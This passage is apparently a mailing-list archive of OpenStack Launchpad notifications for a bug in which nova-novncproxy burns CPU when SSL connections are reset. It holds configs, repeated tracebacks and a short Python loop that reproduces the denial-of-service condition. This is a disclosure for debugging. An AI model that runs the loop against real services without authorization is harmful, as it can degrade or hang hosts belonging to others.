0.000s inner /usr/lib/python2.7/site-packag es/oslo_concurrency/lockutils.py:273 2019-02-19 15:02:45.395 2889 DEBUG oslo_concurrency.lockutils [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Lock "9f9825dd-868f-41cc-9c8e-e544f1528d6a" released by "nova.context.get_or_set_cached_cell_and_set_connections" :: held 0.003s inner /usr/lib/python2.7/site-packages /oslo_concurrency/lockutils.py:285 2019-02-19 15:02:45.437 2889 DEBUG oslo_db.sqlalchemy.engines [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] MySQL server mode set to STRICT_TRANS_TABLES,STRICT_ALL_TABLES,NO_ZERO_IN_DATE,NO_ZERO_DATE,ERROR_FOR_DIVISION_BY_ZERO,TRADITIONAL,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTI TUTION _check_effective_sql_mode /usr/lib/python2.7/site-packages/oslo_db/sqlalchemy/engines.py:308 2019-02-19 15:02:45.443 2889 DEBUG oslo_db.sqlalchemy.engines [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] MySQL server mode set to STRICT_TRANS_TABLES,STRICT_ALL_TABLES,NO_ZERO_IN_DATE,NO_ZERO_DATE,ERROR_FOR_DIVISION_BY_ZERO,TRADITIONAL,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTI TUTION _check_effective_sql_mode /usr/lib/python2.7/site-packages/oslo_db/sqlalchemy/engines.py:308 2019-02-19 15:02:45.451 2889 INFO nova.compute.rpcapi [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Automatically selected compute RPC version 5.0 from minimum service version 35 2019-02-19 15:02:45.452 2889 INFO nova.console.websocketproxy [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] handler exception: [Errno 104] Connection reset by peer 2019-02-19 15:02:45.452 2889 DEBUG nova.console.websocketproxy [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] exception vmsg /usr/lib/python2.7/site-packages/websockify/websocket.py:873 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy Traceback (most recent call last): 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/websockify/websocket.py", line 928, in top_new_client 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy client = self.do_handshake(startsock, address) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/websockify/websocket.py", line 858, in do_handshake 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy self.RequestHandlerClass(retsock, address, self) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/nova/console/websocketproxy.py", line 311, in __init__ 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy websockify.ProxyRequestHandler.__init__(self, *args, **kwargs) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/websockify/websocket.py", line 113, in __init__ 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy SimpleHTTPRequestHandler.__init__(self, req, addr, server) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib64/python2.7/SocketServer.py", line 652, in __init__ 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy self.handle() 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/websockify/websocket.py", line 579, in handle 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy SimpleHTTPRequestHandler.handle(self) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib64/python2.7/BaseHTTPServer.py", line 340, in handle 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy self.handle_one_request() 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib64/python2.7/BaseHTTPServer.py", line 310, in handle_one_request 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy self.raw_requestline = self.rfile.readline(65537) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib64/python2.7/socket.py", line 480, in readline 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy data = self._sock.recv(self._rbufsize) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/eventlet/green/ssl.py", line 190, in recv 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy return self._base_recv(buflen, flags, into=False) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/eventlet/green/ssl.py", line 217, in _base_recv 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy read = self.read(nbytes) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/eventlet/green/ssl.py", line 135, in read 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy super(GreenSSLSocket, self).read, *args, **kwargs) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/eventlet/green/ssl.py", line 109, in _call_trampolining 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy return func(*a, **kw) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib64/python2.7/ssl.py", line 673, in read 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy v = self._sslobj.read(len) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy error: [Errno 104] Connection reset by peer 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy 2019-02-19 15:02:47.037 2880 DEBUG nova.console.websocketproxy [-] 192.168.237.85: new handler Process vmsg /usr/lib/python2.7/site-packages/websockify/websocket.py:873 (paste: http://paste.openstack.org/show/745451/) This sequence starting with the "new handler Process" repeats continuously. It seems that the haproxy health checks initiate an SSL connection but then immediately send a TCP RST: http://git.haproxy.org/?p=haproxy.git;a=commit;h=fd29cc537b8511db6e256529ded625c8e7f856d0 For most services this does not seem to be an issue, but for nova- novncproxy it repeatedly initializes NovaProxyRequestHandler which creates a full nova.compute.rpcapi.ComputeAPI instance which very quickly starts to consume significant CPU and overtake the host. Note that we tried upgrading to HEAD of websockify and eventlet which did not improve the issue. Our workaround was to turn off check-ssl in haproxy and use a basic tcp check, but we're concerned that nova-novncproxy remains vulnerable to a DOS attack given how easy it is for haproxy to overload the service. For that reason I'm opening this initially as a security bug, though you could perhaps argue that it's no secret that making un-ratelimited requests at any service will cause high load. Steps to reproduce ================== 1. Configure nova-novncproxy to use SSL by setting the cert= and key= parameters in [DEFAULT] and turn on debug logging. 2. You can simulate the haproxy SSL health check with this python script:     import socket, ssl, struct, time     host = '192.168.237.81'     port = 5554     while True:         sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)         ssl_sock = ssl.wrap_socket(sock)         ssl_sock.connect((host, port))         ssl_sock.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0))         sock.close()         time.sleep(2) Expected result =============== nova-novncproxy should gracefully handle the RST and not start overutilizing CPU. It should probably hold off on initializing database connections and such until a meaningful request other than an SSL HELLO is received. Actual result ============= The nova-novncproxy process quickly jumps to the top of the CPU% metrics of process analyzers like top and htop and if left unattended on a server with few cores will cause the server's overall performance to be degraded. Environment =========== We found this on the latest of the stable/rocky branch on SLES: # cat /etc/os-release NAME="SLES" VERSION="12-SP4" VERSION_ID="12.4" PRETTY_NAME="SUSE Linux Enterprise Server 12 SP4" # uname -a Linux d52-54-77-77-01-01 4.12.14-95.6-default #1 SMP Thu Jan 17 06:04:39 UTC 2019 (6af4ef8) x86_64 x86_64 x86_64 GNU/Linux # zypper info openstack-nova Information for package openstack-nova: --------------------------------------- Repository : Cloud Name : openstack-nova Version : 18.1.1~dev47-749.1 Arch : noarch Vendor : obs://build.suse.de/Devel:Cloud Support Level : Level 3 Installed Size : 444.7 KiB Installed : Yes Status : up-to-date Source package : openstack-nova-18.1.1~dev47-749.1.src Summary : OpenStack Compute (Nova) # zypper info haproxy Information for package haproxy: -------------------------------- Repository : Cloud Name : haproxy Version : 1.6.11-10.2 Arch : x86_64 Vendor : SUSE LLC Support Level : Level 3 Installed Size : 3.1 MiB Installed : Yes Status : up-to-date Source package : haproxy-1.6.11-10.2.src ** Changed in: ossa Status: Incomplete => Won't Fix ** Tags added: security ** Information type changed from Private Security to Public -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1816727 Title: nova-novncproxy does not handle TCP RST cleanly when using SSL Status in OpenStack Compute (nova): New Status in OpenStack Security Advisory: Won't Fix Bug description: Description =========== We have nova-novncproxy configured to use SSL: ``` [DEFAULT] ssl_only=true cert = /etc/nova/ssl/certs/signing_cert.pem key = /etc/nova/ssl/private/signing_key.pem ... [vnc] enabled = True server_listen = "0.0.0.0" server_proxyclient_address = 192.168.237.81 novncproxy_host = 192.168.237.81 novncproxy_port = 5554 novncproxy_base_url = https://:6080/vnc_auto.html xvpvncproxy_host = 192.168.237.81 ``` We also have haproxy acting as a load balancer, but not terminating SSL. We have an haproxy health check configured like this for nova- novncproxy: ``` listen nova-novncproxy     # irrelevant config...     server 192.168.237.84:5554 check check-ssl verify none inter 2000 rise 5 fall 2 ``` where 192.168.237.81 is a virtual IP address and 192.168.237.84 is the node's individual IP address. With that health check enabled, we found the nova-novncproxy process CPU spiking and eventually causing the node to hang. With debug logging enabled, we noticed this in the nova-novncproxy logs: 2019-02-19 15:02:44.148 2880 INFO nova.console.websocketproxy [-] WebSocket server settings: 2019-02-19 15:02:44.149 2880 INFO nova.console.websocketproxy [-] - Listen on 192.168.237.81:5554 2019-02-19 15:02:44.149 2880 INFO nova.console.websocketproxy [-] - Flash security policy server 2019-02-19 15:02:44.149 2880 INFO nova.console.websocketproxy [-] - Web server (no directory listings). Web root: /usr/share/novnc 2019-02-19 15:02:44.150 2880 INFO nova.console.websocketproxy [-] - SSL/TLS support 2019-02-19 15:02:44.151 2880 INFO nova.console.websocketproxy [-] - proxying from 192.168.237.81:5554 to None:None 2019-02-19 15:02:45.015 2880 DEBUG nova.console.websocketproxy [-] 192.168.237.85: new handler Process vmsg /usr/lib/python2.7/site-packages/websockify/websocket.py:873 2019-02-19 15:02:45.184 2889 DEBUG oslo_db.sqlalchemy.engines [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] MySQL server mode set to STRICT_TRANS_TABLES,STRICT_ALL_TABLES,NO_ZERO_IN_DATE,NO_ZERO_DATE,ERROR_FOR_DIVISION_BY_ZERO,TRADITIONAL,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTI TUTION _check_effective_sql_mode /usr/lib/python2.7/site-packages/oslo_db/sqlalchemy/engines.py:308 2019-02-19 15:02:45.377 2889 DEBUG nova.context [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Found 2 cells: 00000000-0000-0000-0000-000000000000(cell0),9f9825dd-868f-41cc-9c8e-e544f1528d6a(cell1) load_cells /usr/lib/python2.7/site-packages/nova/context.py:479 2019-02-19 15:02:45.380 2889 DEBUG oslo_concurrency.lockutils [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Lock "00000000-0000-0000-0000-000000000000" acquired by "nova.context.get_or_set_cached_cell_and_set_connections" :: waited 0.000s inner /usr/lib/python2.7/site-packag es/oslo_concurrency/lockutils.py:273 2019-02-19 15:02:45.382 2889 DEBUG oslo_concurrency.lockutils [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Lock "00000000-0000-0000-0000-000000000000" released by "nova.context.get_or_set_cached_cell_and_set_connections" :: held 0.002s inner /usr/lib/python2.7/site-packages /oslo_concurrency/lockutils.py:285 2019-02-19 15:02:45.393 2889 DEBUG oslo_concurrency.lockutils [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Lock "9f9825dd-868f-41cc-9c8e-e544f1528d6a" acquired by "nova.context.get_or_set_cached_cell_and_set_connections" :: waited 0.000s inner /usr/lib/python2.7/site-packag es/oslo_concurrency/lockutils.py:273 2019-02-19 15:02:45.395 2889 DEBUG oslo_concurrency.lockutils [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Lock "9f9825dd-868f-41cc-9c8e-e544f1528d6a" released by "nova.context.get_or_set_cached_cell_and_set_connections" :: held 0.003s inner /usr/lib/python2.7/site-packages /oslo_concurrency/lockutils.py:285 2019-02-19 15:02:45.437 2889 DEBUG oslo_db.sqlalchemy.engines [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] MySQL server mode set to STRICT_TRANS_TABLES,STRICT_ALL_TABLES,NO_ZERO_IN_DATE,NO_ZERO_DATE,ERROR_FOR_DIVISION_BY_ZERO,TRADITIONAL,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTI TUTION _check_effective_sql_mode /usr/lib/python2.7/site-packages/oslo_db/sqlalchemy/engines.py:308 2019-02-19 15:02:45.443 2889 DEBUG oslo_db.sqlalchemy.engines [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] MySQL server mode set to STRICT_TRANS_TABLES,STRICT_ALL_TABLES,NO_ZERO_IN_DATE,NO_ZERO_DATE,ERROR_FOR_DIVISION_BY_ZERO,TRADITIONAL,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTI TUTION _check_effective_sql_mode /usr/lib/python2.7/site-packages/oslo_db/sqlalchemy/engines.py:308 2019-02-19 15:02:45.451 2889 INFO nova.compute.rpcapi [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Automatically selected compute RPC version 5.0 from minimum service version 35 2019-02-19 15:02:45.452 2889 INFO nova.console.websocketproxy [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] handler exception: [Errno 104] Connection reset by peer 2019-02-19 15:02:45.452 2889 DEBUG nova.console.websocketproxy [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] exception vmsg /usr/lib/python2.7/site-packages/websockify/websocket.py:873 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy Traceback (most recent call last): 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/websockify/websocket.py", line 928, in top_new_client 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy client = self.do_handshake(startsock, address) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/websockify/websocket.py", line 858, in do_handshake 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy self.RequestHandlerClass(retsock, address, self) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/nova/console/websocketproxy.py", line 311, in __init__ 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy websockify.ProxyRequestHandler.__init__(self, *args, **kwargs) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/websockify/websocket.py", line 113, in __init__ 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy SimpleHTTPRequestHandler.__init__(self, req, addr, server) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib64/python2.7/SocketServer.py", line 652, in __init__ 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy self.handle() 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/websockify/websocket.py", line 579, in handle 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy SimpleHTTPRequestHandler.handle(self) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib64/python2.7/BaseHTTPServer.py", line 340, in handle 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy self.handle_one_request() 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib64/python2.7/BaseHTTPServer.py", line 310, in handle_one_request 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy self.raw_requestline = self.rfile.readline(65537) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib64/python2.7/socket.py", line 480, in readline 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy data = self._sock.recv(self._rbufsize) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/eventlet/green/ssl.py", line 190, in recv 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy return self._base_recv(buflen, flags, into=False) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/eventlet/green/ssl.py", line 217, in _base_recv 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy read = self.read(nbytes) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/eventlet/green/ssl.py", line 135, in read 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy super(GreenSSLSocket, self).read, *args, **kwargs) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/eventlet/green/ssl.py", line 109, in _call_trampolining 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy return func(*a, **kw) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib64/python2.7/ssl.py", line 673, in read 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy v = self._sslobj.read(len) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy error: [Errno 104] Connection reset by peer 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy 2019-02-19 15:02:47.037 2880 DEBUG nova.console.websocketproxy [-] 192.168.237.85: new handler Process vmsg /usr/lib/python2.7/site-packages/websockify/websocket.py:873 (paste: http://paste.openstack.org/show/745451/) This sequence starting with the "new handler Process" repeats continuously. It seems that the haproxy health checks initiate an SSL connection but then immediately send a TCP RST: http://git.haproxy.org/?p=haproxy.git;a=commit;h=fd29cc537b8511db6e256529ded625c8e7f856d0 For most services this does not seem to be an issue, but for nova- novncproxy it repeatedly initializes NovaProxyRequestHandler which creates a full nova.compute.rpcapi.ComputeAPI instance which very quickly starts to consume significant CPU and overtake the host. Note that we tried upgrading to HEAD of websockify and eventlet which did not improve the issue. Our workaround was to turn off check-ssl in haproxy and use a basic tcp check, but we're concerned that nova-novncproxy remains vulnerable to a DOS attack given how easy it is for haproxy to overload the service. For that reason I'm opening this initially as a security bug, though you could perhaps argue that it's no secret that making un-ratelimited requests at any service will cause high load. Steps to reproduce ================== 1. Configure nova-novncproxy to use SSL by setting the cert= and key= parameters in [DEFAULT] and turn on debug logging. 2. You can simulate the haproxy SSL health check with this python script:     import socket, ssl, struct, time     host = '192.168.237.81'     port = 5554     while True:         sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)         ssl_sock = ssl.wrap_socket(sock)         ssl_sock.connect((host, port))         ssl_sock.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0))         sock.close()         time.sleep(2) Expected result =============== nova-novncproxy should gracefully handle the RST and not start overutilizing CPU. It should probably hold off on initializing database connections and such until a meaningful request other than an SSL HELLO is received. Actual result ============= The nova-novncproxy process quickly jumps to the top of the CPU% metrics of process analyzers like top and htop and if left unattended on a server with few cores will cause the server's overall performance to be degraded. Environment =========== We found this on the latest of the stable/rocky branch on SLES: # cat /etc/os-release NAME="SLES" VERSION="12-SP4" VERSION_ID="12.4" PRETTY_NAME="SUSE Linux Enterprise Server 12 SP4" # uname -a Linux d52-54-77-77-01-01 4.12.14-95.6-default #1 SMP Thu Jan 17 06:04:39 UTC 2019 (6af4ef8) x86_64 x86_64 x86_64 GNU/Linux # zypper info openstack-nova Information for package openstack-nova: --------------------------------------- Repository : Cloud Name : openstack-nova Version : 18.1.1~dev47-749.1 Arch : noarch Vendor : obs://build.suse.de/Devel:Cloud Support Level : Level 3 Installed Size : 444.7 KiB Installed : Yes Status : up-to-date Source package : openstack-nova-18.1.1~dev47-749.1.src Summary : OpenStack Compute (Nova) # zypper info haproxy Information for package haproxy: -------------------------------- Repository : Cloud Name : haproxy Version : 1.6.11-10.2 Arch : x86_64 Vendor : SUSE LLC Support Level : Level 3 Installed Size : 3.1 MiB Installed : Yes Status : up-to-date Source package : haproxy-1.6.11-10.2.src To manage notifications about this bug go to: https://bugs.launchpad.net/nova/+bug/1816727/+subscriptions From 1816727 at bugs.launchpad.net Wed Mar 20 20:39:29 2019 From: 1816727 at bugs.launchpad.net (OpenStack Infra) Date: Wed, 20 Mar 2019 20:39:29 -0000 Subject: [Openstack-security] =?utf-8?q?=5BBug_1816727=5D_Re=3A_nova-novnc?= =?utf-8?q?proxy_does_not_handle_TCP_RST_cleanly_when_using_SSL=C2=A0?= References: <155065649227.28374.17032096910895521610.malonedeb@chaenomeles.canonical.com> Message-ID: <155311436940.19441.7529218002646289218.malone@chaenomeles.canonical.com> Fix proposed to branch: master Review: https://review.openstack.org/644998 ** Changed in: nova Status: New => In Progress ** Changed in: nova Assignee: (unassigned) => melanie witt (melwitt) -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1816727 Title: nova-novncproxy does not handle TCP RST cleanly when using SSL Status in OpenStack Compute (nova): In Progress Status in OpenStack Security Advisory: Won't Fix Bug description: Description =========== We have nova-novncproxy configured to use SSL: ``` [DEFAULT] ssl_only=true cert = /etc/nova/ssl/certs/signing_cert.pem key = /etc/nova/ssl/private/signing_key.pem ... [vnc] enabled = True server_listen = "0.0.0.0" server_proxyclient_address = 192.168.237.81 novncproxy_host = 192.168.237.81 novncproxy_port = 5554 novncproxy_base_url = https://:6080/vnc_auto.html xvpvncproxy_host = 192.168.237.81 ``` We also have haproxy acting as a load balancer, but not terminating SSL. We have an haproxy health check configured like this for nova- novncproxy: ``` listen nova-novncproxy     # irrelevant config...     server 192.168.237.84:5554 check check-ssl verify none inter 2000 rise 5 fall 2 ``` where 192.168.237.81 is a virtual IP address and 192.168.237.84 is the node's individual IP address. With that health check enabled, we found the nova-novncproxy process CPU spiking and eventually causing the node to hang. With debug logging enabled, we noticed this in the nova-novncproxy logs: 2019-02-19 15:02:44.148 2880 INFO nova.console.websocketproxy [-] WebSocket server settings: 2019-02-19 15:02:44.149 2880 INFO nova.console.websocketproxy [-] - Listen on 192.168.237.81:5554 2019-02-19 15:02:44.149 2880 INFO nova.console.websocketproxy [-] - Flash security policy server 2019-02-19 15:02:44.149 2880 INFO nova.console.websocketproxy [-] - Web server (no directory listings). Web root: /usr/share/novnc 2019-02-19 15:02:44.150 2880 INFO nova.console.websocketproxy [-] - SSL/TLS support 2019-02-19 15:02:44.151 2880 INFO nova.console.websocketproxy [-] - proxying from 192.168.237.81:5554 to None:None 2019-02-19 15:02:45.015 2880 DEBUG nova.console.websocketproxy [-] 192.168.237.85: new handler Process vmsg /usr/lib/python2.7/site-packages/websockify/websocket.py:873 2019-02-19 15:02:45.184 2889 DEBUG oslo_db.sqlalchemy.engines [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] MySQL server mode set to STRICT_TRANS_TABLES,STRICT_ALL_TABLES,NO_ZERO_IN_DATE,NO_ZERO_DATE,ERROR_FOR_DIVISION_BY_ZERO,TRADITIONAL,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTI TUTION _check_effective_sql_mode /usr/lib/python2.7/site-packages/oslo_db/sqlalchemy/engines.py:308 2019-02-19 15:02:45.377 2889 DEBUG nova.context [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Found 2 cells: 00000000-0000-0000-0000-000000000000(cell0),9f9825dd-868f-41cc-9c8e-e544f1528d6a(cell1) load_cells /usr/lib/python2.7/site-packages/nova/context.py:479 2019-02-19 15:02:45.380 2889 DEBUG oslo_concurrency.lockutils [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Lock "00000000-0000-0000-0000-000000000000" acquired by "nova.context.get_or_set_cached_cell_and_set_connections" :: waited 0.000s inner /usr/lib/python2.7/site-packag es/oslo_concurrency/lockutils.py:273 2019-02-19 15:02:45.382 2889 DEBUG oslo_concurrency.lockutils [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Lock "00000000-0000-0000-0000-000000000000" released by "nova.context.get_or_set_cached_cell_and_set_connections" :: held 0.002s inner /usr/lib/python2.7/site-packages /oslo_concurrency/lockutils.py:285 2019-02-19 15:02:45.393 2889 DEBUG oslo_concurrency.lockutils [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Lock "9f9825dd-868f-41cc-9c8e-e544f1528d6a" acquired by "nova.context.get_or_set_cached_cell_and_set_connections" :: waited 0.000s inner /usr/lib/python2.7/site-packag es/oslo_concurrency/lockutils.py:273 2019-02-19 15:02:45.395 2889 DEBUG oslo_concurrency.lockutils [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Lock "9f9825dd-868f-41cc-9c8e-e544f1528d6a" released by "nova.context.get_or_set_cached_cell_and_set_connections" :: held 0.003s inner /usr/lib/python2.7/site-packages /oslo_concurrency/lockutils.py:285 2019-02-19 15:02:45.437 2889 DEBUG oslo_db.sqlalchemy.engines [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] MySQL server mode set to STRICT_TRANS_TABLES,STRICT_ALL_TABLES,NO_ZERO_IN_DATE,NO_ZERO_DATE,ERROR_FOR_DIVISION_BY_ZERO,TRADITIONAL,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTI TUTION _check_effective_sql_mode /usr/lib/python2.7/site-packages/oslo_db/sqlalchemy/engines.py:308 2019-02-19 15:02:45.443 2889 DEBUG oslo_db.sqlalchemy.engines [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] MySQL server mode set to STRICT_TRANS_TABLES,STRICT_ALL_TABLES,NO_ZERO_IN_DATE,NO_ZERO_DATE,ERROR_FOR_DIVISION_BY_ZERO,TRADITIONAL,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTI TUTION _check_effective_sql_mode /usr/lib/python2.7/site-packages/oslo_db/sqlalchemy/engines.py:308 2019-02-19 15:02:45.451 2889 INFO nova.compute.rpcapi [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Automatically selected compute RPC version 5.0 from minimum service version 35 2019-02-19 15:02:45.452 2889 INFO nova.console.websocketproxy [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] handler exception: [Errno 104] Connection reset by peer 2019-02-19 15:02:45.452 2889 DEBUG nova.console.websocketproxy [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] exception vmsg /usr/lib/python2.7/site-packages/websockify/websocket.py:873 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy Traceback (most recent call last): 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/websockify/websocket.py", line 928, in top_new_client 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy client = self.do_handshake(startsock, address) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/websockify/websocket.py", line 858, in do_handshake 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy self.RequestHandlerClass(retsock, address, self) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/nova/console/websocketproxy.py", line 311, in __init__ 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy websockify.ProxyRequestHandler.__init__(self, *args, **kwargs) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/websockify/websocket.py", line 113, in __init__ 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy SimpleHTTPRequestHandler.__init__(self, req, addr, server) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib64/python2.7/SocketServer.py", line 652, in __init__ 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy self.handle() 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/websockify/websocket.py", line 579, in handle 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy SimpleHTTPRequestHandler.handle(self) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib64/python2.7/BaseHTTPServer.py", line 340, in handle 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy self.handle_one_request() 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib64/python2.7/BaseHTTPServer.py", line 310, in handle_one_request 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy self.raw_requestline = self.rfile.readline(65537) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib64/python2.7/socket.py", line 480, in readline 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy data = self._sock.recv(self._rbufsize) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/eventlet/green/ssl.py", line 190, in recv 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy return self._base_recv(buflen, flags, into=False) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/eventlet/green/ssl.py", line 217, in _base_recv 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy read = self.read(nbytes) 2019-02-19 15:02:45.452 2889 ERROR 